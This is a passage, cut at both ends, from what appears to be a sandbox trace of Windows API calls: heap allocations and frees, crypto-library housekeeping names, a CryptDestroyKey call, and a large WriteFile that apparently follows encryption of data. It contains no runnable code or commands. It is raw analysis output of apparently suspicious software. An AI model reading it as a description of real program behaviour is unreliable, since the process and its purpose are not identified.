pdwDataLen=0x144e088*=0x15742, dwBufLen=0x15750 | out: pbData=0x49af758*, pdwDataLen=0x144e088*=0x15750) returned 1 [0101.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0101.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0101.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0101.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0101.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0101.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0101.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0101.791] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0101.791] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0101.791] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.791] WriteFile (in: hFile=0x298, lpBuffer=0x452b768*, nNumberOfBytesToWrite=0x15750, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x452b768*, lpNumberOfBytesWritten=0x144ea8c*=0x15750, lpOverlapped=0x0) returned 1 [0101.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0101.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x452b768 | out: hHeap=0x1780000) returned 1 [0101.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0101.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0101.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0101.794] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c60 [0101.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0101.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0101.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0101.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0101.795] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0101.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0101.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0101.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0101.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0101.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0101.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0101.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0101.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0101.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0101.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0101.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0101.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0101.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9e8 [0101.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0101.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0101.795] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0101.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0101.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0101.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2c00 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0101.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0101.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0101.796] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ba0 [0101.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0101.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b90 [0101.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0101.797] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0101.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0101.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0101.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0101.797] PeekMessageW (in: lpMsg=0x144e264, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e264) returned 0 [0101.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0101.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c90 [0101.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0101.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0101.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0101.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0101.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0101.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0101.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0101.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0101.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0101.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0101.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0101.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0101.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0101.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0101.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0101.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0101.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0101.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0101.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0101.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0101.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0101.798] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0101.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0101.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d10 [0101.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0101.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0101.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0101.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0101.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0101.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0101.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0101.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0101.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0101.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0101.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0101.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0101.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0101.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0101.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c40 [0101.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0101.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cabc8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0101.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0101.799] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0101.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0101.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0101.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0101.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d10 [0101.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0101.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0101.799] CryptDestroyKey (hKey=0x41ac140) returned 1 [0101.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0101.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0101.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0101.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0101.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0101.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0101.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0101.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0101.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0101.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0101.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0101.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0101.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0101.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0101.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0101.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0101.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0101.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0101.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0101.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0101.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0101.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0101.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0101.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0101.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0101.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0101.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0101.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0101.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0101.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0101.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0101.800] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0101.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0101.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0101.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0101.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0101.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0101.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0101.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0101.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0101.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0101.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0101.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0101.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0101.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0101.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0101.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0101.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0101.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0101.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b80 [0101.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0101.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0101.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0101.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0101.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0101.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0101.801] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0101.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0101.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0101.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0101.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0101.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0101.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0101.801] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0101.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0101.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0101.801] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0101.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0101.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0101.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad30 [0101.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0101.801] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0101.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0101.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0101.802] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0101.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0101.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0101.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac10 [0101.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0101.802] PeekMessageW (in: lpMsg=0x144e404, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e404) returned 0 [0101.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0101.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0101.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0101.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0101.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0101.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0101.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0101.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0101.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0101.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caca0 [0101.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0101.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cace8 [0101.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaf0 [0101.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab68 [0101.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad00 [0101.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0101.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac58 [0101.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0101.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0101.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0101.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0101.803] RtlAllocateHeap (HeapHandle=0x1780000, 